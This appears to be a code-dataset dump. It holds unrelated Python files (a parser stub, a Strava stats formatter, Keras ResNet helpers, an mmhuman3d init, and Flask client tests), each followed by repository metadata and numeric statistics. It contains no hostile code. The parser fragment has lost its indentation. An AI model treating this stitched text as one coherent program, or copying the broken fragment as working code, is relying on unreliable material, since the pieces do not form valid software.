KEYWORDS = ('False', 'None', 'True', 'and', 'as', 'assert', 'async', 'await', 'break', 'class', 'continue', 'def', 'del', 'elif', 'else', 'except', 'finally', 'for', 'from', 'global', 'if', 'import', 'in', 'is', 'lambda', 'nonlocal', 'not', 'or', 'pass', 'raise', 'return', 'try', 'while', 'with', 'yield')
SOFT_KEYWORDS = ('_', 'case', 'match')
if __name__ == '__main__':
from pegen.parser import simple_parser_main
simple_parser_main(PythonParser)
| 33.209377
| 689
| 0.521984
| 35,840
| 339,267
| 4.646401
| 0.021456
| 0.056531
| 0.064638
| 0.052256
| 0.81914
| 0.781735
| 0.750041
| 0.719517
| 0.678923
| 0.64383
| 0
| 0.012266
| 0.359354
| 339,267
| 10,215
| 690
| 33.212628
| 0.753904
| 0.085184
| 0
| 0.814871
| 1
| 0
| 0.021064
| 0.000801
| 0
| 0
| 0
| 0
| 0.00087
| 1
| 0.053267
| false
| 0.000435
| 0.004892
| 0.000326
| 0.190673
| 0.000109
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0a5bce3bf5e74ac08979e9e4ea5aba2e15e03fd7
| 9,944
|
py
|
Python
|
scripts/commands/stats/format.py
|
AirP0WeR/strava-telegram-bot
|
3fab6fbce1c94d45b77a957879bdaba86577fd2c
|
[
"MIT"
] | null | null | null |
scripts/commands/stats/format.py
|
AirP0WeR/strava-telegram-bot
|
3fab6fbce1c94d45b77a957879bdaba86577fd2c
|
[
"MIT"
] | null | null | null |
scripts/commands/stats/format.py
|
AirP0WeR/strava-telegram-bot
|
3fab6fbce1c94d45b77a957879bdaba86577fd2c
|
[
"MIT"
] | null | null | null |
# -*- encoding: utf-8 -*-
from common.operations import Operations
class FormatStats:
def __init__(self, calculated_stats):
self.calculated_stats = calculated_stats
self.operations = Operations()
def ride_stats(self, stats_type, stats_type_key):
ride_stats = "*Ride - {stats_type}:* _({name}'s stats as on {stats_updated} UTC)_\n\n".format(
stats_type=stats_type, stats_updated=self.calculated_stats['updated'],
name=self.calculated_stats['athlete_name'])
if self.calculated_stats['ride_{}_total'.format(stats_type_key)] > 0:
ride_stats += "- _Rides_: {total} ".format(
total=self.calculated_stats['ride_{}_total'.format(stats_type_key)])
if self.calculated_stats['ride_{}_indoor_total'.format(stats_type_key)] > 0:
ride_stats += "(Includes {total_indoor} Indoors)\n".format(
total_indoor=self.calculated_stats['ride_{}_indoor_total'.format(stats_type_key)])
else:
ride_stats += "\n"
ride_stats += "- _Distance_: {distance} km ".format(distance=self.operations.meters_to_kilometers(
self.calculated_stats['ride_{}_distance'.format(stats_type_key)]))
if self.calculated_stats['ride_{}_indoor_distance'.format(stats_type_key)] > 0:
ride_stats += "(Includes {indoor_distance} km of Indoors)\n".format(
indoor_distance=self.operations.meters_to_kilometers(
self.calculated_stats['ride_{}_indoor_distance'.format(stats_type_key)]))
else:
ride_stats += "\n"
ride_stats += "- _Moving Time_: {moving_time} hours ".format(
moving_time=self.operations.seconds_to_human_readable(
self.calculated_stats['ride_{}_moving_time'.format(stats_type_key)]))
if self.calculated_stats['ride_{}_indoor_moving_time'.format(stats_type_key)] > 0:
ride_stats += "(Includes {indoor_moving_time} hours of Indoors)\n".format(
indoor_moving_time=self.operations.seconds_to_human_readable(
self.calculated_stats['ride_{}_indoor_moving_time'.format(stats_type_key)]))
else:
ride_stats += "\n"
ride_stats += "- _Elevation Gain_: {elevation_gain} km\n".format(
elevation_gain=self.operations.meters_to_kilometers(
self.calculated_stats['ride_{}_elevation_gain'.format(stats_type_key)]))
ride_stats += "- _Biggest Ride_: {biggest_ride} km\n".format(
biggest_ride=self.operations.meters_to_kilometers(
self.calculated_stats['ride_{}_biggest_ride'.format(stats_type_key)]))
if self.calculated_stats['ride_{}_fifty'.format(stats_type_key)] > 0:
ride_stats += "- _50's_: {fifties}\n".format(
fifties=self.calculated_stats['ride_{}_fifty'.format(stats_type_key)])
if self.calculated_stats['ride_{}_hundred'.format(stats_type_key)] > 0:
ride_stats += "- _100's_: {hundreds}".format(
hundreds=self.calculated_stats['ride_{}_hundred'.format(stats_type_key)])
else:
ride_stats = "No activities found during this period."
return ride_stats
return ride_stats
def run_stats(self, stats_type, stats_type_key):
run_stats = "*Run - {stats_type}:* _({name}'s stats as on {stats_updated} UTC)_\n\n".format(
stats_type="{stats_type}".format(stats_type=stats_type), stats_updated=self.calculated_stats['updated'],
name=self.calculated_stats['athlete_name'])
if self.calculated_stats['run_{}_total'.format(stats_type_key)] > 0:
run_stats += "- _Runs_: {total} ".format(total=self.calculated_stats['run_{}_total'.format(stats_type_key)])
if self.calculated_stats['run_{}_indoor_total'.format(stats_type_key)] > 0:
run_stats += "(Includes {total_indoor} Indoors)\n".format(
total_indoor=self.calculated_stats['run_{}_indoor_total'.format(stats_type_key)])
else:
run_stats += "\n"
run_stats += "- _Distance_: {distance} km ".format(distance=self.operations.meters_to_kilometers(
self.calculated_stats['run_{}_distance'.format(stats_type_key)]))
if self.calculated_stats['run_{}_indoor_distance'.format(stats_type_key)] > 0:
run_stats += "(Includes {indoor_distance} km of Indoors)\n".format(
indoor_distance=self.operations.meters_to_kilometers(
self.calculated_stats['run_{}_indoor_distance'.format(stats_type_key)]))
else:
run_stats += "\n"
run_stats += "- _Moving Time_: {moving_time} hours ".format(
moving_time=self.operations.seconds_to_human_readable(
self.calculated_stats['run_{}_moving_time'.format(stats_type_key)]))
if self.calculated_stats['run_{}_indoor_moving_time'.format(stats_type_key)] > 0:
run_stats += "(Includes {indoor_moving_time} hours of Indoors)\n".format(
indoor_moving_time=self.operations.seconds_to_human_readable(
self.calculated_stats['run_{}_indoor_moving_time'.format(stats_type_key)]))
else:
run_stats += "\n"
run_stats += "- _Elevation Gain_: {elevation_gain} km\n".format(
elevation_gain=self.operations.meters_to_kilometers(
self.calculated_stats['run_{}_elevation_gain'.format(stats_type_key)]))
run_stats += "- _Biggest Run_: {biggest_run} km\n".format(
biggest_run=self.operations.meters_to_kilometers(
self.calculated_stats['run_{}_biggest_run'.format(stats_type_key)]))
if self.calculated_stats['run_{}_five'.format(stats_type_key)] > 0:
run_stats += "- _5's_: {five}\n".format(
five=self.calculated_stats['run_{}_five'.format(stats_type_key)])
if self.calculated_stats['run_{}_ten'.format(stats_type_key)] > 0:
run_stats += "- _10's_: {ten}\n".format(
ten=self.calculated_stats['run_{}_ten'.format(stats_type_key)])
if self.calculated_stats['run_{}_hm'.format(stats_type_key)] > 0:
run_stats += "- _HM's_: {hm}\n".format(hm=self.calculated_stats['run_{}_hm'.format(stats_type_key)])
if self.calculated_stats['run_{}_fm'.format(stats_type_key)] > 0:
run_stats += "- _FM's_: {fm}\n".format(fm=self.calculated_stats['run_{}_fm'.format(stats_type_key)])
if self.calculated_stats['run_{}_ultra'.format(stats_type_key)] > 0:
run_stats += "- _Ultra's_: {ultra}".format(
ultra=self.calculated_stats['run_{}_ultra'.format(stats_type_key)])
else:
run_stats = "No activities found during this period."
return run_stats
return run_stats
def swim_stats(self, stats_type, stats_type_key):
swim_stats = "*Swim - {stats_type}:* _({name}'s stats as on {stats_updated} UTC)_\n\n".format(
stats_type="{stats_type}".format(stats_type=stats_type), stats_updated=self.calculated_stats['updated'],
name=self.calculated_stats['athlete_name'])
if self.calculated_stats['swim_{}_total'.format(stats_type_key)] > 0:
swim_stats += "- _Swims_: {total}\n".format(
total=self.calculated_stats['swim_{}_total'.format(stats_type_key)])
swim_stats += "- _Distance_: {distance} km\n".format(distance=self.operations.meters_to_kilometers(
self.calculated_stats['swim_{}_distance'.format(stats_type_key)]))
swim_stats += "- _Moving Time_: {moving_time} hours\n".format(
moving_time=self.operations.seconds_to_human_readable(
self.calculated_stats['swim_{}_moving_time'.format(stats_type_key)]))
swim_stats += "- _Biggest Swim_: {biggest_swim} km\n".format(
biggest_swim=self.operations.meters_to_kilometers(
self.calculated_stats['swim_{}_biggest_swim'.format(stats_type_key)]))
if self.calculated_stats['swim_{}_50'.format(stats_type_key)] > 0:
swim_stats += "- _50 m_: {fifty}\n".format(
fifty=self.calculated_stats['swim_{}_50'.format(stats_type_key)])
if self.calculated_stats['swim_{}_100'.format(stats_type_key)] > 0:
swim_stats += "- _100 m_: {hundred}\n".format(
hundred=self.calculated_stats['swim_{}_100'.format(stats_type_key)])
if self.calculated_stats['swim_{}_200'.format(stats_type_key)] > 0:
swim_stats += "- _200 m_: {two_hundred}\n".format(
two_hundred=self.calculated_stats['swim_{}_200'.format(stats_type_key)])
if self.calculated_stats['swim_{}_400'.format(stats_type_key)] > 0:
swim_stats += "- _400 m_: {four_hundred}\n".format(
four_hundred=self.calculated_stats['swim_{}_400'.format(stats_type_key)])
if self.calculated_stats['swim_{}_800'.format(stats_type_key)] > 0:
swim_stats += "- _800 m_: {eight_hundred}\n".format(
eight_hundred=self.calculated_stats['swim_{}_800'.format(stats_type_key)])
if self.calculated_stats['swim_{}_1500'.format(stats_type_key)] > 0:
swim_stats += "- _1500+ m_: {thousand_five_hundred}".format(
thousand_five_hundred=self.calculated_stats['swim_{}_1500'.format(stats_type_key)])
else:
swim_stats = "No activities found during this period."
return swim_stats
return swim_stats
| 63.74359
| 120
| 0.625402
| 1,178
| 9,944
| 4.825976
| 0.06961
| 0.11715
| 0.210554
| 0.174142
| 0.869305
| 0.851539
| 0.817766
| 0.77555
| 0.747405
| 0.462797
| 0
| 0.011315
| 0.24457
| 9,944
| 155
| 121
| 64.154839
| 0.745474
| 0.002313
| 0
| 0.253623
| 0
| 0.021739
| 0.226961
| 0.026013
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028986
| false
| 0
| 0.007246
| 0
| 0.086957
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0a693d0ca5714d4b4fabc1c8e2fa947e7fb069e9
| 7,977
|
py
|
Python
|
utils/resnet_helpers.py
|
guoyk1990/Keras-FCN
|
75a6d8a7ceb7618c3dd03e5cc9c3ceed181e1652
|
[
"MIT"
] | 733
|
2016-11-09T16:42:46.000Z
|
2022-02-25T06:21:10.000Z
|
utils/resnet_helpers.py
|
guoyk1990/Keras-FCN
|
75a6d8a7ceb7618c3dd03e5cc9c3ceed181e1652
|
[
"MIT"
] | 80
|
2016-12-15T09:12:25.000Z
|
2021-11-17T11:26:21.000Z
|
utils/resnet_helpers.py
|
guoyk1990/Keras-FCN
|
75a6d8a7ceb7618c3dd03e5cc9c3ceed181e1652
|
[
"MIT"
] | 349
|
2016-10-21T01:36:56.000Z
|
2021-12-06T00:40:19.000Z
|
from keras.layers import *
from keras.layers.merge import Add
from keras.regularizers import l2
# The original help functions from keras does not have weight regularizers, so I modified them.
# Also, I changed these two functions into functional style
def identity_block(kernel_size, filters, stage, block, weight_decay=0., batch_momentum=0.99):
'''The identity_block is the block that has no conv layer at shortcut
# Arguments
kernel_size: defualt 3, the kernel size of middle conv layer at main path
filters: list of integers, the nb_filters of 3 conv layer at main path
stage: integer, current stage label, used for generating layer names
block: 'a','b'..., current block label, used for generating layer names
'''
def f(input_tensor):
nb_filter1, nb_filter2, nb_filter3 = filters
if K.image_data_format() == 'channels_last':
bn_axis = 3
else:
bn_axis = 1
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
x = Conv2D(nb_filter1, (1, 1), name=conv_name_base + '2a', kernel_regularizer=l2(weight_decay))(input_tensor)
x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2a', momentum=batch_momentum)(x)
x = Activation('relu')(x)
x = Conv2D(nb_filter2, (kernel_size, kernel_size),
padding='same', name=conv_name_base + '2b', kernel_regularizer=l2(weight_decay))(x)
x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2b', momentum=batch_momentum)(x)
x = Activation('relu')(x)
x = Conv2D(nb_filter3, (1, 1), name=conv_name_base + '2c', kernel_regularizer=l2(weight_decay))(x)
x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2c', momentum=batch_momentum)(x)
x = Add()([x, input_tensor])
x = Activation('relu')(x)
return x
return f
def conv_block(kernel_size, filters, stage, block, weight_decay=0., strides=(2, 2), batch_momentum=0.99):
'''conv_block is the block that has a conv layer at shortcut
# Arguments
kernel_size: defualt 3, the kernel size of middle conv layer at main path
filters: list of integers, the nb_filters of 3 conv layer at main path
stage: integer, current stage label, used for generating layer names
block: 'a','b'..., current block label, used for generating layer names
Note that from stage 3, the first conv layer at main path is with strides=(2,2)
And the shortcut should have strides=(2,2) as well
'''
def f(input_tensor):
nb_filter1, nb_filter2, nb_filter3 = filters
if K.image_data_format() == 'channels_last':
bn_axis = 3
else:
bn_axis = 1
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
x = Conv2D(nb_filter1, (1, 1), strides=strides,
name=conv_name_base + '2a', kernel_regularizer=l2(weight_decay))(input_tensor)
x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2a', momentum=batch_momentum)(x)
x = Activation('relu')(x)
x = Conv2D(nb_filter2, (kernel_size, kernel_size), padding='same',
name=conv_name_base + '2b', kernel_regularizer=l2(weight_decay))(x)
x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2b', momentum=batch_momentum)(x)
x = Activation('relu')(x)
x = Conv2D(nb_filter3, (1, 1), name=conv_name_base + '2c', kernel_regularizer=l2(weight_decay))(x)
x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2c', momentum=batch_momentum)(x)
shortcut = Conv2D(nb_filter3, (1, 1), strides=strides,
name=conv_name_base + '1', kernel_regularizer=l2(weight_decay))(input_tensor)
shortcut = BatchNormalization(axis=bn_axis, name=bn_name_base + '1', momentum=batch_momentum)(shortcut)
x = Add()([x, shortcut])
x = Activation('relu')(x)
return x
return f
# Atrous-Convolution version of residual blocks
def atrous_identity_block(kernel_size, filters, stage, block, weight_decay=0., atrous_rate=(2, 2), batch_momentum=0.99):
'''The identity_block is the block that has no conv layer at shortcut
# Arguments
kernel_size: defualt 3, the kernel size of middle conv layer at main path
filters: list of integers, the nb_filters of 3 conv layer at main path
stage: integer, current stage label, used for generating layer names
block: 'a','b'..., current block label, used for generating layer names
'''
def f(input_tensor):
nb_filter1, nb_filter2, nb_filter3 = filters
if K.image_data_format() == 'channels_last':
bn_axis = 3
else:
bn_axis = 1
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
x = Conv2D(nb_filter1, (1, 1), name=conv_name_base + '2a', kernel_regularizer=l2(weight_decay))(input_tensor)
x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2a', momentum=batch_momentum)(x)
x = Activation('relu')(x)
x = Conv2D(nb_filter2, (kernel_size, kernel_size), dilation_rate=atrous_rate,
padding='same', name=conv_name_base + '2b', kernel_regularizer=l2(weight_decay))(x)
x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2b', momentum=batch_momentum)(x)
x = Activation('relu')(x)
x = Conv2D(nb_filter3, (1, 1), name=conv_name_base + '2c', kernel_regularizer=l2(weight_decay))(x)
x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2c', momentum=batch_momentum)(x)
x = Add()([x, input_tensor])
x = Activation('relu')(x)
return x
return f
def atrous_conv_block(kernel_size, filters, stage, block, weight_decay=0., strides=(1, 1), atrous_rate=(2, 2), batch_momentum=0.99):
'''conv_block is the block that has a conv layer at shortcut
# Arguments
kernel_size: defualt 3, the kernel size of middle conv layer at main path
filters: list of integers, the nb_filters of 3 conv layer at main path
stage: integer, current stage label, used for generating layer names
block: 'a','b'..., current block label, used for generating layer names
'''
def f(input_tensor):
nb_filter1, nb_filter2, nb_filter3 = filters
if K.image_data_format() == 'channels_last':
bn_axis = 3
else:
bn_axis = 1
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
x = Conv2D(nb_filter1, (1, 1), strides=strides,
name=conv_name_base + '2a', kernel_regularizer=l2(weight_decay))(input_tensor)
x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2a', momentum=batch_momentum)(x)
x = Activation('relu')(x)
x = Conv2D(nb_filter2, (kernel_size, kernel_size), padding='same', dilation_rate=atrous_rate,
name=conv_name_base + '2b', kernel_regularizer=l2(weight_decay))(x)
x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2b', momentum=batch_momentum)(x)
x = Activation('relu')(x)
x = Conv2D(nb_filter3, (1, 1), name=conv_name_base + '2c', kernel_regularizer=l2(weight_decay))(x)
x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2c', momentum=batch_momentum)(x)
shortcut = Conv2D(nb_filter3, (1, 1), strides=strides,
name=conv_name_base + '1', kernel_regularizer=l2(weight_decay))(input_tensor)
shortcut = BatchNormalization(axis=bn_axis, name=bn_name_base + '1', momentum=batch_momentum)(shortcut)
x = Add()([x, shortcut])
x = Activation('relu')(x)
return x
return f
| 51.464516
| 132
| 0.648239
| 1,116
| 7,977
| 4.420251
| 0.103943
| 0.058382
| 0.043787
| 0.045408
| 0.921346
| 0.917494
| 0.917494
| 0.917494
| 0.913035
| 0.913035
| 0
| 0.024318
| 0.237057
| 7,977
| 154
| 133
| 51.798701
| 0.786231
| 0.230036
| 0
| 0.888889
| 0
| 0
| 0.040592
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.080808
| false
| 0
| 0.030303
| 0
| 0.191919
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6a6acbb4976d2f7a5a881a547055c56a485c882e
| 157
|
py
|
Python
|
mmhuman3d/data/data_structures/__init__.py
|
ttxskk/mmhuman3d
|
f6d39e24a2d5cc216448fc3bd82832ff45eee436
|
[
"Apache-2.0"
] | null | null | null |
mmhuman3d/data/data_structures/__init__.py
|
ttxskk/mmhuman3d
|
f6d39e24a2d5cc216448fc3bd82832ff45eee436
|
[
"Apache-2.0"
] | null | null | null |
mmhuman3d/data/data_structures/__init__.py
|
ttxskk/mmhuman3d
|
f6d39e24a2d5cc216448fc3bd82832ff45eee436
|
[
"Apache-2.0"
] | null | null | null |
from mmhuman3d.data.data_structures import human_data
from mmhuman3d.data.data_structures.human_data import HumanData
__all__ = ['HumanData', 'human_data']
| 31.4
| 63
| 0.834395
| 21
| 157
| 5.809524
| 0.380952
| 0.221311
| 0.278689
| 0.344262
| 0.508197
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013889
| 0.082803
| 157
| 4
| 64
| 39.25
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0.121019
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6a8b8518a8f54bb9b7f454ec64f7db31bc79da59
| 28,477
|
py
|
Python
|
dialogue-engine/test/programytest/clients/restful/yadlan/flask/test_client.py
|
cotobadesign/cotoba-agent-oss
|
3833d56e79dcd7529c3e8b3a3a8a782d513d9b12
|
[
"MIT"
] | 104
|
2020-03-30T09:40:00.000Z
|
2022-03-06T22:34:25.000Z
|
dialogue-engine/test/programytest/clients/restful/yadlan/flask/test_client.py
|
cotobadesign/cotoba-agent-oss
|
3833d56e79dcd7529c3e8b3a3a8a782d513d9b12
|
[
"MIT"
] | 25
|
2020-06-12T01:36:35.000Z
|
2022-02-19T07:30:44.000Z
|
dialogue-engine/test/programytest/clients/restful/yadlan/flask/test_client.py
|
cotobadesign/cotoba-agent-oss
|
3833d56e79dcd7529c3e8b3a3a8a782d513d9b12
|
[
"MIT"
] | 10
|
2020-04-02T23:43:56.000Z
|
2021-05-14T13:47:01.000Z
|
"""
Copyright (c) 2020 COTOBA DESIGN, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import unittest
import unittest.mock
import os
import shutil
from programy.clients.restful.yadlan.flask.client import FlaskYadlanClient
from programy.clients.restful.client import UserInfo
from programytest.clients.arguments import MockArgumentParser
class MockFlaskYadlanClient(FlaskYadlanClient):
def __init__(self, argument_parser=None):
FlaskYadlanClient.__init__(self, "yadlan", argument_parser)
self.aborted = False
self.answer = None
self.ask_question_exception = False
def server_abort(self, error_code, error_msg):
self.aborted = True
raise Exception("Pretending to abort!")
def ask_question(self, userid, question, userInfo, deleteVariable, loglevel, nlu_latency=True):
if self.ask_question_exception is True:
raise Exception("Something bad happened")
return self.answer, question
class FlaskYadlanClientTests(unittest.TestCase):
def test_rest_client_init(self):
arguments = MockArgumentParser()
client = FlaskYadlanClient("yadlan", arguments)
self.assertIsNotNone(client)
def test_verify_api_key_usage_inactive(self):
arguments = MockArgumentParser()
client = FlaskYadlanClient("yadlan", arguments)
self.assertIsNotNone(client)
client.configuration.client_configuration._use_api_keys = False
request = unittest.mock.Mock()
self.assertEqual((None, None), client.verify_api_key_usage(request))
def test_get_api_key(self):
arguments = MockArgumentParser()
client = FlaskYadlanClient("yadlan", arguments)
request = unittest.mock.Mock()
request.args = {}
request.args['apikey'] = '11111111'
self.assertEqual('11111111', client.get_api_key(request))
def test_verify_api_key_usage_active(self):
arguments = MockArgumentParser()
client = FlaskYadlanClient("yadlan", arguments)
self.assertIsNotNone(client)
client.configuration.client_configuration._use_api_keys = True
client.configuration.client_configuration._api_key_file = os.path.dirname(__file__) + os.sep + ".." + os.sep + ".." + os.sep + "api_keys.txt"
client.load_api_keys()
request = unittest.mock.Mock()
request.args = {}
request.args['apikey'] = '11111111'
self.assertEqual(({'error': 'Unauthorized access'}, 401), client.verify_api_key_usage(request))
def test_verify_api_key_usage_active_no_apikey(self):
arguments = MockArgumentParser()
client = MockFlaskYadlanClient(arguments)
client.configuration.client_configuration._use_api_keys = True
request = unittest.mock.Mock()
request.args = {}
response = client.verify_api_key_usage(request)
self.assertIsNotNone(response)
def test_verify_api_key_usage_active_invalid_apikey(self):
arguments = MockArgumentParser()
client = MockFlaskYadlanClient(arguments)
client.configuration.client_configuration._use_api_keys = True
request = unittest.mock.Mock()
request.args = {}
request.args['apikey'] = 'invalid'
response = client.verify_api_key_usage(request)
self.assertIsNotNone(response)
def test_get_question(self):
arguments = MockArgumentParser()
client = FlaskYadlanClient("yadlan", arguments)
self.assertIsNotNone(client)
request = unittest.mock.Mock()
request.data = b'{"userId": "1234567890", "utterance": "Hello"}'
self.assertEqual("Hello", client.get_question(request))
def test_get_question_no_question(self):
arguments = MockArgumentParser()
client = MockFlaskYadlanClient(arguments)
self.assertIsNotNone(client)
request = unittest.mock.Mock()
request.data = b'{"userId": "1234567890", "utterance": null}'
self.assertEqual("None", client.get_question(request))
def test_get_question_none_question(self):
arguments = MockArgumentParser()
client = MockFlaskYadlanClient(arguments)
self.assertIsNotNone(client)
request = unittest.mock.Mock()
request.data = b'{"userId": "1234567890"}'
self.assertEqual("None", client.get_question(request))
def test_get_userid(self):
arguments = MockArgumentParser()
client = FlaskYadlanClient("yadlan", arguments)
self.assertIsNotNone(client)
request = unittest.mock.Mock()
request.data = b'{"userId": "1234567890"}'
self.assertEqual("1234567890", client.get_userid(request))
def test_get_userid_no_userid(self):
arguments = MockArgumentParser()
client = MockFlaskYadlanClient(arguments)
self.assertIsNotNone(client)
request = unittest.mock.Mock()
request.data = b'{}'
self.assertEqual("None", client.get_userid(request))
def test_get_userid_none_userid(self):
arguments = MockArgumentParser()
client = MockFlaskYadlanClient(arguments)
self.assertIsNotNone(client)
request = unittest.mock.Mock()
request.data = b'{"userId": null}'
self.assertEqual("None", client.get_userid(request))
request.data = b'{"userId": ""}'
self.assertEqual("None", client.get_userid(request))
def test_get_other_data(self):
arguments = MockArgumentParser()
client = MockFlaskYadlanClient(arguments)
self.assertIsNotNone(client)
request = unittest.mock.Mock()
request.data = b'{"config": {"logLevel": "debug"}}'
self.assertEqual("debug", client.get_config_option(request, 'logLevel'))
self.assertEqual("debug", client.get_config_loglevel(request))
request.data = b'{"config": {"logLevel": "DEBUG"}}'
with self.assertRaises(Exception):
client.get_config_loglevel(request)
request.data = b'{"variables": {"test": "value"}}'
self.assertEqual('{"test": "value"}', client.get_variables(request))
def test_invalid_request_empty(self):
arguments = MockArgumentParser()
client = MockFlaskYadlanClient(arguments)
self.assertIsNotNone(client)
request = unittest.mock.Mock()
request.data = b''
with self.assertRaises(Exception):
client.get_userid(request)
self.assertTrue(client.aborted)
with self.assertRaises(Exception):
client.get_deleteVariable(request)
self.assertTrue(client.aborted)
with self.assertRaises(Exception):
client.get_metadata(request)
self.assertTrue(client.aborted)
with self.assertRaises(Exception):
client.get_config_option(request, 'logLevel')
self.assertTrue(client.aborted)
with self.assertRaises(Exception):
client.get_variables(request)
self.assertTrue(client.aborted)
def test_invalid_request_not_json(self):
arguments = MockArgumentParser()
client = MockFlaskYadlanClient(arguments)
self.assertIsNotNone(client)
request = unittest.mock.Mock()
request.data = b'test_data, aaa'
with self.assertRaises(Exception):
client.get_userid(request)
self.assertTrue(client.aborted)
with self.assertRaises(Exception):
client.get_deleteVariable(request)
self.assertTrue(client.aborted)
with self.assertRaises(Exception):
client.get_metadata(request)
self.assertTrue(client.aborted)
with self.assertRaises(Exception):
client.get_config_option(request, 'logLevel')
self.assertTrue(client.aborted)
with self.assertRaises(Exception):
client.get_variables(request)
self.assertTrue(client.aborted)
def test_format_success_response(self):
arguments = MockArgumentParser()
client = FlaskYadlanClient("yadlan", arguments)
self.assertIsNotNone(client)
request = unittest.mock.Mock()
request.data = b'{"userId": "1234567890"}'
userInfo = UserInfo(client, request)
response = client.format_success_response("1234567890", "Hello", "Hi", userInfo)
self.assertIsNotNone(response)
self.assertEqual("1234567890", response['userId'])
self.assertEqual("Hello", response['utterance'])
self.assertEqual("Hi", response['response'])
self.assertEqual("None", response['topic'])
def test_format_error_response(self):
arguments = MockArgumentParser()
client = FlaskYadlanClient("yadlan", arguments)
self.assertIsNotNone(client)
request = unittest.mock.Mock()
request.data = b'{"userId": "1234567890"}'
userInfo = UserInfo(client, request)
response = client.format_error_response("1234567890", "Hello", "Something Bad", userInfo)
self.assertIsNotNone(response)
self.assertEqual("1234567890", response['userId'])
self.assertEqual("Hello", response['utterance'])
self.assertEqual("", response['response'])
self.assertEqual("None", response['topic'])
self.assertEqual("Something Bad", response['error'])
def test_process_request(self):
arguments = MockArgumentParser()
client = MockFlaskYadlanClient(arguments)
self.assertIsNotNone(client)
client.configuration.client_configuration._use_api_keys = False
request = unittest.mock.Mock()
request.data = b'{"userId": "1234567890", "utterance": "Hello"}'
client.answer = "Hi"
response, _ = client.process_request(request)
self.assertIsNotNone(response)
self.assertEqual("1234567890", response['userId'])
self.assertEqual("Hello", response['utterance'])
self.assertEqual("Hi", response['response'])
def test_process_request_no_api_key(self):
arguments = MockArgumentParser()
client = MockFlaskYadlanClient(arguments)
self.assertIsNotNone(client)
client.configuration.client_configuration._use_api_keys = True
request = unittest.mock.Mock()
request.args = {}
request.data = b'{"userId": "1234567890", "utterance": "Hello"}'
client.answer = "Hi"
response, status = client.process_request(request)
self.assertIsNotNone(response)
self.assertEqual(status, 401)
def test_process_request_no_question(self):
arguments = MockArgumentParser()
client = FlaskYadlanClient("yadlan", arguments)
self.assertIsNotNone(client)
request = unittest.mock.Mock()
request.args = {}
request.data = b'{"userId": "1234567890"}'
response, status = client.process_request(request)
self.assertIsNotNone(response)
self.assertEqual(status, 400)
def test_process_request_exception(self):
arguments = MockArgumentParser()
client = MockFlaskYadlanClient(arguments)
self.assertIsNotNone(client)
client.configuration.client_configuration._use_api_keys = False
request = unittest.mock.Mock()
request.data = b'{"userId": "1234567890", "utterance": "Hello"}'
client.answer = "Hi"
client.ask_question_exception = True
response, status = client.process_request(request)
self.assertIsNotNone(response)
self.assertEqual(status, 500)
def test_checkBotVersion(self):
arguments = MockArgumentParser()
client = MockFlaskYadlanClient(arguments)
self.assertIsNotNone(client)
self.assertEqual(False, client.checkBotVersion('v1.0'))
